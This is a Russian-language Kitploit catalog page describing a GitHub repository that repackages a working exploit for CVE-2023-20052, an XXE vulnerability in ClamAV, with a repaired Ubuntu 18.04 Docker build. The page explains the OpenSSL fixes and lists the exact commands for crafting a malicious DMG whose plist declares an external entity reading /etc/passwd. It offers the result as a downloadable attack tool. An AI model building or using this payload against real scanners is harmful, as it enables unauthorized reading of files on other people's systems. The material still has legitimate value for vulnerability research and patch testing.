Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-20052 | Kitploit
Инструменты/GitHubGitHub/mohitsinghpapola/cve-2023-20052
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФаззингАнализ вредоносных программАнализ Бинарных Файлов
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-20052 Exploit - Исправленная сборка

Исправленная Docker-сборка для CVE-2023-20052 (XXE-уязвимость ClamAV), которая действительно компилируется.

Что было сломано

Исходный эксплойт не собирается на современных системах:

  • ❌ Ошибки совместимости с OpenSSL 3.0
  • ❌ Ошибки неполного типа структуры HMAC_CTX
  • ❌ Ошибки неявного объявления функций
  • ❌ Сборка падает при компиляции dmg/filevault.c

Что я исправил

  1. Изменил базовый образ: Ubuntu 22.04 → Ubuntu 18.04
  2. Исправил версию OpenSSL: используется libssl1.0-dev (OpenSSL 1.0)
  3. Добавил неинтерактивный режим: предотвращает запросы при сборке
  4. Рабочий Dockerfile: действительно успешно компилируется

Почему это работает

libdmg-hfsplus использует устаревшие функции OpenSSL 1.0:

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (удалены в OpenSSL 1.1+)
  • Прямое использование структуры HMAC_CTX (непрозрачна в OpenSSL 1.1+)

Ubuntu 18.04 — последний LTS-релиз с поддержкой OpenSSL 1.0.

Сборка и использование

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

Благодарности

  • Оригинальный эксплойт: nokn0wthing/CVE-2023-20052
  • Исправлено: https://reapsec.com
root@kitploit:~
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
Скачать инструмент